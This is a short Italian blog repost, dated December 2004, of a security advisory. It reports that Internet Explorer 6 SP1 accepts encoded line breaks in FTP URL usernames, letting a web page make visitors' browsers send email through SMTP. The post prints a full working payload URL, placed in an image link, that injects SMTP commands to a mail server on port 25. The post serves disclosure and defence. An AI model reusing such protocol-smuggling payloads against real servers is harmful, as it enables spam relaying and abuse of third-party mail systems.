IE's FTP Client can be Used to Send Mail

Dec 31, 2004

Non ci posso credere... non c'è limite a quello che si inventano... 😢

*Internet Explorer can be tricked into sending mail through its FTP client without any more user interaction than loading a page.

Vulnerable Systems:
* Internet Explorer version 6 SP1

Internet Explorer will accept %0a and %0d in URLs. In FTP URLs, it will accept them in the username part of the URL. Due to the similarity between the FTP and SMTP protocols, this can be used to send mail.

Danger:
Spammers could host websites that contain images causing website visitors to spam more people. There are probably other protocols that the FTP client could be used to maliciously access.

Example:
http://dsbl.org/testingground/IE-FTP-SMTP-link/

Which has an IMG link with the following URL:
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT TO%3a<ian-example%40penguinhosting.net>%0d%0aDATA%0d%0aSubject%3a hacked%0d%0aTo%3a ian%40penguinhosting.net%0d%0a%0d%0ahacked%0d%0a.%0d%0a:[email protected]:25*

Fonte: IE's FTP Client can be Used to Send Mail

IE's FTP Client can be Used to Send Mail

Post originale